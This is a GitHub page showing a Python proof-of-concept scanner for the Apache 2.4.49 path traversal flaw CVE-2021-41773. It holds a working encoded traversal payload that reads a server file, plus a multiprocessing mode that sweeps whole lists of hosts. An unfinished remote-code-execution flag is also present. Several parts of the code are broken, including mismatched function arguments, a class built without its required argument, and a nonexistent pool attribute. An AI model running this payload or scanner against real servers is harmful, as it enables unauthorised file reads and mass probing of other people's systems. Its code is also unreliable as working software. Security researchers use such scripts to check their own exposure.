-
Notifications
You must be signed in to change notification settings - Fork 38
/
Copy pathCVE-2021-41773.py
161 lines (124 loc) · 5.29 KB
/
CVE-2021-41773.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
############################################################################
# PoC for CVE-2021-41773 #
# By: Jordan Jay (@0xLegacyy) #
# Modified: Remon Svensson (@RemonSwe) #
# Apache 2.4.49 is the only version vulnerable to this. #
############################################################################
import argparse
import urllib3
import time
from os import cpu_count, path
import multiprocessing as mp
import signal
class POC:
def __init__(self, args):
self.host = args.host
self.file = args.targetFile
if self.host and not self.file:
self.single_host()
else:
self.cores = args.cores
self.threaded()
def check_host(self, host):
# Try reading /usr/share/bash-completion/bash_completion, is world readable and in /usr/share, so default config should allow us to read it.
# If we see the flag in the response, it's vulnerable.
if not ("://" in host):
print("[!] Host paramater missing protocol (http:// or https://)\n")
return
# TODO: Come up with a better flag as this doesn't *always* exist, its just very likely.
flag = "bash_completion - programmable completion functions for bash"
payload = ".%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/usr/share/bash-completion/bash_completion"
try:
http = urllib3.PoolManager()
response = http.request("GET", f"{host}/images/{payload}") # changed dir to images as it almost always exists, maybe add fuzzing/flag for this in future?
if flag not in response.data.decode("utf-8"):
print(f"[-] {host} not vulnerable")
return
print(f"[+] {host} is vulnerable!")
except(Exception):
print("Exception:", host)
def single_host(self):
self.check_host(self.host)
def threaded(self):
pool = mp.Pool(int(self.cores), init_worker)
for chunkStart, chunkSize in chunkify(self.file):
pool.apply_async(process_wrapper, (chunkStart, chunkSize, self.file))
try:
print("[*][INFO] To exit, press \"Ctrl + C\"")
while pool._chunk:
time.sleep(1)
except KeyboardInterrupt:
print("[*][MULTI][WARNING] Caught KeyboardInterrupt, terminating workers")
pool.terminate()
pool.join()
pool.close()
def run(self, rce=False):
self.check_host(self.host, rce)
return True
def verify_args(args):
if args:
# Ensure the user specified a host OR a target file
if not (args.host or args.targetFile):
print("[*][GENERAL][WARNING] Requires atleast one of the following arguments\n"
"[--host TARGETHOST, -h TARGETHOST] [--file TARGETFILE, -f TARGETFILE]")
return False
# Ensure the target file exists if specified
if args.targetFile:
if not path.exists(args.targetFile):
print(f"[*][FILE][WARNING] Target file \"{args.targetFile}\" could not be found...")
return False
# Ensure no. cores is between 1 and the amount of cores a user has on their system.
if args.cores < 1 or args.cores > cpu_count():
print(f"[*][CORES][WARNING] Maximum amount is {cpu_count()}, amount entered {args.cores}")
return False
else:
print(f"[*][GENERAL][WARNING] No arguments given, use \"-h\" for information")
return False
return True
def chunkify(fname,chunkSize=4096):
fileEnd = path.getsize(fname)
with open(fname,'rb') as f:
chunkEnd = f.tell()
while True:
chunkStart = chunkEnd
f.seek(chunkSize,1)
f.readline()
chunkEnd = f.tell()
yield chunkStart, chunkEnd - chunkStart
if chunkEnd > fileEnd:
break
def init_worker():
signal.signal(signal.SIGINT, signal.SIG_IGN)
def process(poc, host):
poc.host = host
poc.run()
def process_wrapper(chunkStart, chunkSize, fname):
poc = POC()
with open(fname) as f:
f.seek(chunkStart)
hosts = f.read(chunkSize).splitlines()
for host in hosts:
process(poc, host)
if __name__ == "__main__":
# Set up args.
parser = argparse.ArgumentParser(description="Checks if an apache server is vulnerable to CVE-2021-41773.")
parser.add_argument(
"--host", dest="host",
help="ip/domain to be checked e.g. 'https://google.com/'."
)
parser.add_argument(
"--cores", "-C", dest="cores", default=1, type=int,
help="Specify number of cores that should be dedicated to the task, default: 1"
)
parser.add_argument(
"--file", "-f", dest="targetFile", default=None,
help="Specify file to fetch list of hosts from, example: \"/home/user/Desktop/myfile.txt\""
)
#TO-DO: Add functionality for flag --rce.
parser.add_argument(
"--rce", "-r", dest="rce", default=False, action="store_false",
help="When toggled checks if target is susceptible to RCE (NOT YET IMPLEMENTED!)"
)
args = parser.parse_args()
if verify_args(args):
POC(args)